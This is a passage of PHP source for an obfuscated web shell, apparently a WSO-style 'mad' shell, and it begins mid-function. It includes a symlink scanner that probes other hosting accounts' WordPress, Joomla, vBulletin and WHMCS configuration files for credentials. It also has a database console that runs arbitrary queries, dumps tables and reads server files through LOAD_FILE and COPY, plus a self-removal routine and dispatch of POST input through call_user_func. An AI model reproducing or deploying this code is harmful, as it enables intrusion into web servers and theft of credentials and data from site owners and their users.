"; } else { echo " "; foreach($IIIIIIIIIllI as $IIIIIIIIIll1){ if(@eregi('zone',$IIIIIIIIIll1)){ preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11); flush(); if(strlen(trim($IIIIIIIIIl11[1][0])) >2){ $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0])); $IIIIIIIII1l1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/wp-config.php'; $IIIIIIIII11I=get_headers($IIIIIIIII1l1); $IIIIIIIII11l=$IIIIIIIII11I[0]; $IIIIIIIII111=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/blog/wp-config.php'; $IIIIIIIIlIII=get_headers($IIIIIIIII111); $IIIIIIIIlIIl=$IIIIIIIIlIII[0]; $IIIIIIIIlII1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/configuration.php'; $IIIIIIIIlIlI=get_headers($IIIIIIIIlII1); $IIIIIIIIlIll=$IIIIIIIIlIlI[0]; $IIIIIIIIlIl1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/joomla/configuration.php'; $IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1); $IIIIIIIIlI1l=$IIIIIIIIlI1I[0]; $IIIIIIIIlI11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/includes/config.php'; $IIIIIIIIllII=get_headers($IIIIIIIIlI11); $IIIIIIIIllIl=$IIIIIIIIllII[0]; $IIIIIIIIllI1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/vb/includes/config.php'; $IIIIIIIIlllI=get_headers($IIIIIIIIllI1); $IIIIIIIIllll=$IIIIIIIIlllI[0]; $IIIIIIIIlll1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/forum/includes/config.php'; $IIIIIIIIll1I=get_headers($IIIIIIIIlll1); $IIIIIIIIll1l=$IIIIIIIIll1I[0]; $IIIIIIIIll11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'public_html/clients/configuration.php'; $IIIIIIIIl1II=get_headers($IIIIIIIIll11); $IIIIIIIIl1Il=$IIIIIIIIl1II[0]; $IIIIIIIIl1I1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/support/configuration.php'; $IIIIIIIIl1II=get_headers($IIIIIIIIl1I1); $IIIIIIIIl1lI=$IIIIIIIIl1II[0]; $IIIIIIIIl1ll=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php'; $IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll); $IIIIIIIIl11I=$IIIIIIIIl1l1[0]; $IIIIIIIIl11l=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/submitticket.php'; $IIIIIIIIl111=get_headers($IIIIIIIIl11l); $IIIIIIII1III=$IIIIIIIIl111[0]; $IIIIIIII1IIl=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php'; $IIIIIIII1II1=get_headers($IIIIIIII1IIl); $IIIIIIII1IlI=$IIIIIIII1II1[0]; $IIIIIIII1Ill = strpos($IIIIIIIII11l,'200'); $IIIIIIII1I1I=' '; if (strpos($IIIIIIIII11l,'200') == true ) { $IIIIIIII1I1I="Wordpress"; } elseif (strpos($IIIIIIIIlIIl,'200') == true) { $IIIIIIII1I1I="Wordpress"; } elseif (strpos($IIIIIIIIlIll,'200') == true and strpos($IIIIIIII1III,'200') == true ) { $IIIIIIII1I1I=" WHMCS"; } elseif (strpos($IIIIIIIIl1lI,'200') == true) { $IIIIIIII1I1I =" WHMCS"; } elseif (strpos($IIIIIIIIl11I,'200') == true) { $IIIIIIII1I1I =" WHMCS"; } elseif (strpos($IIIIIIIIlIll,'200') == true) { $IIIIIIII1I1I=" Joomla"; } elseif (strpos($IIIIIIIIlI1l,'200') == true) { $IIIIIIII1I1I=" Joomla"; } elseif (strpos($IIIIIIIIllIl,'200') == true) { $IIIIIIII1I1I=" vBulletin"; } elseif (strpos($IIIIIIIIllll,'200') == true) { $IIIIIIII1I1I=" vBulletin"; } elseif (strpos($IIIIIIIIll1l,'200') == true) { $IIIIIIII1I1I=" vBulletin"; } else { continue; } $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ; echo '';flush(); } } } } echo "

Domains	Script
'.$IIIIIIIIIl11[1][0].'	'.$IIIIIIII1I1I.'

"; } echo "

"; madfooter(); } function madsql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $head = true; while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { if($v == null) $item[$k] = "NULL"; elseif(is_numeric($v)) $item[$k] = $v; else $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; $head = false; } else $sql = "\n\t,(".implode(", ", $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if(@$_POST['p2']=='download') { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } madhead(); echo "

Type	Host	Login	Password	Database
MySqlPostgreSql				"; $tmp = ""; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo ""; while($item = $db->fetch()) { list($key, $value) = each($item); echo ''.$value.''; } echo ''; } else echo $tmp; }else echo $tmp; echo "		count the number of rows

"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ""; } echo "

Tables: "; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . " "; } echo " File path:

"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "".$_POST['p2']." ({$num['n']} records) Page # "; echo " of $pages"; if($_POST['p3'] > 1) echo " < Prev"; if($_POST['p3'] < $pages) echo " Next >"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo " "; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo ' '.$key.' null '.nl2br(htmlspecialchars($value)).' '; } else { echo ' Error: '.htmlspecialchars($db->error()).' '; } } echo " "; if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']); echo " "; echo "

"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "

Load file

"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '

'.htmlspecialchars($file['file']).'

'; } } else { echo htmlspecialchars($db->error()); } echo '

'; madfooter(); } function madselfrm() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') madhead(); echo "

"; echo "
    
                /^\
       _.-`:   /   \   :'-._
     ,`    :  |     |  :    '.
   ,`       \,|     |,/       '.
  /           `-...-`           \
 :              .'.              :
 |             . ' .             |
 |             ' . '             |
 :              '.'              :
  \           ,-'''-,           /
   `.       /'|     |'\       ,'
     `._   ;  |     |  ;   _,'
        `-.:  |     |  :,-'
              |     |
              |     |
              |     |
              |     |
              |     |
"; echo '
Kill Me?
Yes

'; madFooter(); } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('mad' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'FilesMan'; if( !empty($_POST['a']) && function_exists('mad' . $_POST['a']) ) call_user_func('mad' . $_POST['a']); exit; ?>